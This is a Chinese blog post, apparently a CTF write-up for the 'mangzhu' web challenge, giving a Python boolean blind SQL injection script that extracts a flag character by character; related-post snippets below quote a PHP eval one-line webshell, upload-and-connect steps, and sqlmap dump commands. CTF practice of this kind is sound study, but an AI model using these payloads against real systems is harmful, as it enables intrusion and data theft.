RDCTF(web:mangzhu)

最新推荐文章于 2024-01-19 10:26:30 发布
原创 最新推荐文章于 2024-01-19 10:26:30 发布 · 287 阅读 · 0 ·
CC 4.0 BY-SA版权
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。

本文介绍了一种通过Python脚本进行SQL注入攻击的方法。利用循环遍历的方式,构造payload并发送POST请求来获取目标网站的flag信息。代码示例清晰地展示了如何通过自动化手段收集敏感数据。

  • 1 进入网站

在这里插入图片描述
输入1 得到的是
在这里插入图片描述
输入2得到的是
在这里插入图片描述
从这里可以找到一个不同的地方,开始写python代码

import requests 
flag=""
a = "Hello, glzjin wants a girlfriend." #成功后的显示
url = "http://localhost/index.php" #题目网址
for i in range(1,50):
    for j in range(1,128):       #两个循环
        payload = "if(ascii(substr((select(flag)from(flag)),{0},1))={1},1,2)".format(i,j)  #运行这个代码,使用循环找到这两个数
        aaa = {'id': payload}    #将这两个数配成字典
        r = requests.post(url, data=aaa)   
        b = r.text
        if a in b:          #如果a是在b里面则记入到flag里面
            flag += chr(j)
            print(flag)
            break


结束!

haozhu945
关注
[CISCN 2019华北Day2]Web1 - 布尔盲注
oZuoShen123的博客
10-05 678
考点:布尔盲注【注意,sql中的substr初始位置是1不是0】 1、页面提示用id传参,而且我们发现是post传参 2、我们传了id=1后提示“Hello, glzjin wants a girlfriend.“ 3、由于这题直接输入查询字符,可以通过字典爆破过滤,过滤了and、order、where、空格等字符 4、传id=1',发现是显示bool值, 这题说明是盲注题型 post: id=0 —— Error Occured When Fetch Result. id=1 —— Hello, gl
rdctf-shizhan1借助蚁剑注入木马找到flag
qq_45970858的博客
09-14 1853
rdctf-shizhan1 进入实战页面 复制链接打开新的页面,在后面输入admins/进入后台管理员页面 找到可以上传文件的地方,例如附件管理,上传文件 此时先需要把php开启 点击网站,打开根目录 点击新建,创建新的php文档 (一句话木马工作原理 <?php @eval($_POST['shell']);?> 这是php的一句话后门中最普遍的一种。它的工作原理是: 首先存在一个名为shell的变量,shell的取值为HTTP的POST方式。Web服务器对shell取值以后,然
RDCTF-faka
weixin_50401030的博客
09-19 526
进入题目找到注入点 找到注入的地方,发现购买那就是一个注入点 利用burp suite进行抓包 发现了一个能注入的点,利用post注入即可,先将代码压缩成一个文件然后再用sqlmap跑 接着利用sqlmap跑数据库 sqlmap -r F:\a.txt -D --tables faka 因为题目名字是faka所以跑faka的表 sqlmap -r F:\a.txt -D faka --tables 接着跑表 -r F:\a.txt -D faka -T ayangw_config..
RDCTF SHIZHAN1
sweetie 的博客
09-14 239
RDCTF SHIZHAN1 拿到题目进入网站 加上robots.txt 按照提示加上/admins/ 登入之前拿到的密码 进入网站后台 寻找注入点 点击附件管理 上传附件 文件内容(一句话木马) 找到刚刚上传的软件 点击在新窗口打开 得到url 打开蚁剑 链接 看代码表示flag在home文件夹里面 双击flag 成功! ...
SQLMap实战——RDCTF靶机训练
qq_50647304的博客
09-12 393
rdctf的题目练习 开启环境进入靶机 找到注入点,用sqlmap测试能否注入: 跑完以后发现能注入,输入python sqlmap.py -u “url” --dbs 查询数据库: 选择数据库rjxy,输入python sqlmap.py -u “url” -D rjxy --tables 查询数据表: 选择manager表,输入 ...
SQL注入学习-RDCTF靶机实战1
qq_46231152的博客
09-10 423
sqlmap的安装 1.获取sqlmap压缩包 2.解压后将其添加进入环境变量 3.打开命令行窗口输入sqlmap.py运行 sqlmap的使用 本次使用的命令 sqlmap.py -u {URL} //查看是否有注入点 sqlmap.py -u {URL} -dbs //爆数据库 sqlmap.py -u {URL} -D db --tables //爆数据表 sqlmap.py -u {URL} -D db -T table --columns //爆字段 sqlmap.py -u {URL} -D
Web安全-用一句话木马拿下RDCTF靶机实战1
qq_46231152的博客
09-15 778
一句话木马 一句话木马短小精悍,而且功能强大,隐蔽性非常好,在入侵中始终扮演着强大的作用。 本次使用的php一句话: <?php @eval($_POST['1']) ?> 用这段代码保存为一个php后门木马 上传木马 本次使用的是RDCTF平台的靶机实战 进入管理员后台界面 找到附件管理,发现了这里可以上传文件 将写好的一句话木马上传 回到首页,找到文件上传的网页 找到一句话木马文件 使用蚁剑连接 拿到flag ...
入侵靶机之实战faka题目注入
weixin_50644728的博客
09-22 525
题目来源:rdctf:8000之faka 1.寻找网站注入点 刚拿到一个新网站,首先大概浏览网站页面内容,该网站比较简单,可点击的地方较少,在购买卡密的地方选择商品后。下面就自动弹出了价格和库存等信息,猜测这里应该跟数据库是有交互的。 2.利用burpsuite抓取数据包 找到了与数据库交互的地方之后,用burpsuite抓包获取网站和数据库之间交换的数据。首先要将burp的intercept处于off状态,回到网站将商品信息选择好后点击付款,但不进行支付。 然后将burp的intercept打开,在h
RDCTF shizhan1(靶机)
qq_50646540的博客
09-15 232
进入网页后台之后, 先编写一个含有木马的文件,可以用文本文档编写,之后将后缀名改为.php 木马内容:<?php @eval($_POST['11']);?> 登录进网站后台之后,将小木马上传进网站
RDCTF-考核
qq_45970858的博客
09-23 400
复制网站并打开找到注入点 找到注入的地方,发现购买那里是一个注入点 此处可利用burp suite进行抓包 发现了一个能注入的点,利用post注入即可, 先将代码压缩成一个文件然后再用sqlmap跑 接着利用sqlmap跑数据库 python sqlmap.py -r c:\lyf\POST.txt -dbs 因为题目名字是faka所以跑faka的表 python sqlmap.py -r c:\lyf\POST.txt -D faka --tables 再跑字段 python sql
CTF在线练习平台
weixin_41949487的博客
02-25 4777
CTF在线练习平台 IDF实验室: http://ctf.idf.cn/ XCTF_OJ竞赛平台:http://oj.xctf.org.cn/problem_archives 网络信息安全攻防学习平台:http://hackinglab.cn/ OWASP在线网络安全攻防实验室:http://www.owasp.org.cn/owasp-project/security-l...
web安全的一句话木马
IerkeU的博客
12-13 2714
一、WEBshell Webshell就是以asp、php、jsp或者cgi等网页文件形式存在的一种命令执行环境,也可以将其称做为一种网页后门。黑客在入侵了一个网站后,通常会将asp或php后门文件与网站服务器WEB目录下正常的网页文件混在一起,然后就可以使用浏览器来访问asp或者php后门,得到一个命令执行环境,以达到控制网站服务器的目的。 webshell根据脚本可以分为PHP脚本木马,ASP脚本木马,也有基于.NET的脚本木马和JSP脚本木马。在国外,还有用python脚本语言写的动态网页,当然也有与
BUUCTF:[CISCN2019 华北赛区 Day2 Web1]Hack World
weixin_74911687的博客
03-03 750
BUUCTF:[CISCN2019 华北赛区 Day2 Web1]Hack World
FUZZ题目讲解
qq_46540840的博客
04-28 3495
FUZZ讲解 文章目录FUZZ讲解前言使用方法补充知识点构造的代码 前言 何为Fuzz简单来说就是模糊测试 模糊测试(fuzz testing)是一种介于完全的手工渗透测试与完全的自动化测试之间的安全性测试类型 就是一遍一遍的去尝试 使用方法 拿buuctf 一道注入题来说 [CISCN2019 华北赛区 Day2 Web1]Hack World 输入1,2,3 分别有不同显示内容分别是 Hello, glzjin wants a girlfriend Do you want to be my gi
[CISCN2019 华北赛区 Day2 Web1] web题-Hack World
BROTHERYY的博客
07-08 415
复现环境:buuoj.cn 输入0:Error Occured When Fetch Result. 输入1:Hello, glzjin wants a girlfriend. 输入2:Do you want to be my girlfriend? 输入3:Error Occured When Fetch Result. 题目提示信息说表名和字段名都是flag,给出id就能得到flag 贴出代码 import requests import time import re url='' flag = ''
[CISCN 2019华北Day2]Web1
最新发布
m0_73612768的博客
01-19 1219
布尔盲注;FUZZ 测试;
BUUCTF闯关日记--[CISCN2019 华北赛区 Day2 Web1]Hack World
qq_64201116的博客
05-22 433
可恶,明明当初想着是写给自己看的,文章越写越多,越来越在意别人会不会看我的文章了,还是太功名利禄了,我得清高点(这是写给自己看,这是写给自己看,这是写给自己看) 进入页面,可以看到只有一个白框,多半是SQL注入 直接开始做题 输入:1 回显:Hello, glzjin wants a girlfriend. 输入:2 回显:Do you want to be my girlfriend? 判断一下是否存在sql注入 分别输入 1+1 2-1 1*1 2/2 //只有2/2有运算后的
BUUCTF__[CISCN2019 华北赛区 Day2 Web1]Hack World_题解
风过江南乱的博客
06-28 3078
BUUCTF__[CISCN2019 华北赛区 Day2 Web1]Hack World_题解
web:mangzhu试题
qq_45970858的博客
09-29 229
输入1,提交,出现Hello, glzjin wants a girlfriend. 输入2,提交,出现Do you want to be my girlfriend? 输入其他数字提交,出现Error Occured When Fetch Result. 发现此题为盲注,根据提示写脚本 import requests flag = “” a = “Hello, glzjin wants a girlfriend.” #成功后的显示 url = “http://935d4641..
【ctf】基于python脚本的sql注入合集(持续更新)
woodwhale的博客
05-14 6574
基于python脚本的sql注入合集(持续更新) 前言 sql注入在ctf的web方向中是常见提醒。简单的sql注入用sqlmap跑一跑自然而然就跑出来了。这篇文章是针对sqlmap跑起来困难的题目,也就是用python写脚本来跑的题目。 那么这种写脚本的题目也有不同的注入方式,例如布尔盲注、时间盲注、异或注入等等,都是通过写脚本来获取sql信息的。这篇文章就写下我认为比较有价值的写脚本题型! 布尔盲注 分析题目 N1BOOK [第一章 web入门]SQL注入-2 这题其实有很多解法,这里我选择比较简答的
评论
成就一亿技术人!
拼手气红包6.0元
还能输入1000个字符
 
红包 添加红包
表情包 插入表情
表情包 代码片
 条评论被折叠 查看
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值